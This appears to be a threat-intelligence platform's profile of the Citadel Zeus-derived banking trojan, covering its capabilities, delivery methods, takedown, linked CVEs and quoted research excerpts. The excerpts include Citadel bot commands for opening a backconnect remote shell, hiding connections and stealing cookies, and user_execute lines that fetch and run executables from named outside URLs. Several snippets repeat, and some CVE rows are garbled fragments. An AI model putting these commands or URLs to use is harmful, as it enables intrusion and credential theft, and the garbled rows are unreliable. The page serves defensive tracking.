Citadel is a Windows banking trojan and Zeus-derived crimeware family first identified in 2011. It emerged from the leaked Zeus code base and became one of the most prominent successors in the banking-malware ecosystem, used to steal financial credentials and other sensitive data at large scale. Citadel was associated with widespread criminal operations targeting financial institutions and their customers worldwide, and prosecutors later asserted that infections exceeded 11 million systems.
Citadel inherited core Zeus-style capabilities while extending them with broader credential theft, webinject support, keylogging, form grabbing, cookie theft, and theft of credentials stored in password managers. Documented variants also supported screenshot capture, video recording, certificate theft, DNS redirection, file theft, remote shell access, SOCKS backconnect, VNC-style remote access, and network scanning. Some variants included modules for mass-mailing, file hunting, and theft of cryptocurrency wallet files, reflecting expansion beyond classic online-banking fraud into broader post-compromise monetization.
Operationally, Citadel functioned as botnet malware with configurable command-and-control infrastructure, modular updates, and automated tasking. It was compatible with the broader Zeus webinject ecosystem, and later Zeus-family malware and crimekits were often compared against or built to replace it. Citadel also appeared alongside other malware in multi-payload campaigns, including ransomware distribution chains.
Observed delivery mechanisms included phishing and spam-based campaigns, exploit-kit and drive-by compromise, and malvertising-linked distribution through the wider banking-trojan ecosystem. Citadel was also hosted and supported by bulletproof hosting providers used by cybercriminals to sustain botnet and fraud operations. In 2013, a coordinated disruption effort involving Microsoft’s Digital Crimes Unit and the FBI targeted Citadel botnet infrastructure.
Citadel is best characterized as a mature Zeus-family banking trojan focused on credential theft and fraudulent transaction enablement, with modular surveillance, remote-access, and data-theft features that made it a major component of financially motivated cybercrime in the early-to-mid 2010s.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
7 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
CVE-2012-1723 : CVE-2012-1723 Successful Path on SWT
CVE-2010-0188 : CVE-2010-0188 Path fliFiWJM 200 OK (application/pdf)
CVE-2012-4681 : CVE-2012-4681 Path on SWT
<edit2 2013-04-27> Added CVE-2013-2493
CVE-2012-5076 : CVE-2012-5076 in Sweet Orange Part of CVE-2012-5076 in WTPsjof.jar
CVE-2011-3544 : CVE-2011-3544 positive Path
CVE-2012-0507 : CVE-2012-0507 Successful Path on SWT
32 distinct techniques documented for this family, organized by ATT&CK tactic.
the defendants pleaded guilty to conspiring to engage in a Racketeer Influenced Corrupt Organization (RICO) arising from their providing “bulletproof hosting” services between 2008 and 2015, which were used by cybercriminals to distribute malware and attack financial institutions and victims throughout the United States.
clients... used this technical infrastructure to disseminate malware used to gain access to victims’ computers, form botnets, and steal banking credentials for use in frauds.
Iframe lead on a Keitaros TDS who lead on malware: That right, second one is a blackhole exploit kit ... First one is RIG exploit kit delivering Chthonic
These are kits that are stitched into hacked or malicious Web sites, so that all visiting browsers are checked for a variety of insecure, outdated plugins, from Flash to Java to Adobe Reader.
bot_bc_add cmd <ip> <port> [Connect Bot > Backconnect Server > Remote Shell]
Trojans evade detection by having dormant capabilities, hiding components in other files, forming part of a rootkit, or using heavy obfuscation.
bot_bc_remove <service> <ip> <port> [Disconnect from the bot and hide connections from 'netstat' output] ... bot_uninstall [Remove bot file and uninstall it]
clients... used this technical infrastructure to disseminate malware used to gain access to victims’ computers, form botnets, and steal banking credentials for use in frauds.
Emotet version 3 resists investigation: if the Trojan detects that it has been started in a virtual machine it functions as usual but uses a different address list for the command centers... all these addresses are false and are used only to mislead investigators.
Carberp works like many other banking trojans by logging keystrokes, spoofing websites, and hiding instances of itself in specific locations.
file_webinjects "injects.txt" ... url_webinjects "localhost/file.php" ... Feature of 'Web-Injects' section for remote instant inject loading
user_cookies_get [Get IE cookies] ... disable_cookies 0/1 [1- Disable IE/FF cookies-storage upload | 0 - Enable]
entry "NetScan" [hostname "host-to-scan.com" ... ports "1-5000" scantype "2"]
report_software 0/1 [1 - Enable stats collection for Installed Software, Firewall version, Antivirus version | 0 - Disable]
entry "FileSearch" [File search by given mask ... search for exact match ... report on anything found matching this pattern.]
Emotet version 3 resists investigation: if the Trojan detects that it has been started in a virtual machine it functions as usual but uses a different address list for the command centers... all these addresses are false and are used only to mislead investigators.
Q: How to work with File Hunter feature? ... download any file from a bot by BotID ... Auto download - uploads files with a given mask ... It's main purpose is to grab *coin files(multibit.dat/litecoin.dat...)
Carberp works like many other banking trojans by logging keystrokes, spoofing websites, and hiding instances of itself in specific locations.
file_webinjects "injects.txt" ... url_webinjects "localhost/file.php" ... Feature of 'Web-Injects' section for remote instant inject loading
Threat hunters often focus on spotting command-and-control (C2) servers, open directories typically identified by the phrase “Index of” and phishing components.
disable_tcpserver 0/1 [1 - Enable opening SOCKS5 port ...] ... bot_bc_add socks <ip> <port> [Connect Bot > Backconnect Server > Socks5]
user_execute <url> [execute given file] ... user_execute http://iguana58.ru/plugins/system/anticopy/ammy.exe ... user_execute htxp://mareikes.com/wp-includes/pomo/server.exe
the defendants did so by monitoring sites used to blocklist technical infrastructure used for crime, moving “flagged” content to new infrastructure
What made the ’Avalanche’ infrastructure special was the use of the so-called double fast flux technique. The complex setup of the Avalanche network was popular amongst cybercriminals, because of the double fast flux technique offering enhanced resilience to takedowns and law enforcement action.
45 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
37 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Citadel is described as a botnet that stole hundreds of millions of dollars from financial institutions.
Credential-harvesting trojan mentioned as the older malware KINS was developed to replace.
PC banking trojan listed among malware actively used to attack companies.
Named malware/tool listed as detectable via SHA-256 hash in a compilation of attacker infrastructure and malware-related indicators. The content shows Citadel and Zeus with the same hash, suggesting a close relationship or duplicate sample labeling.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.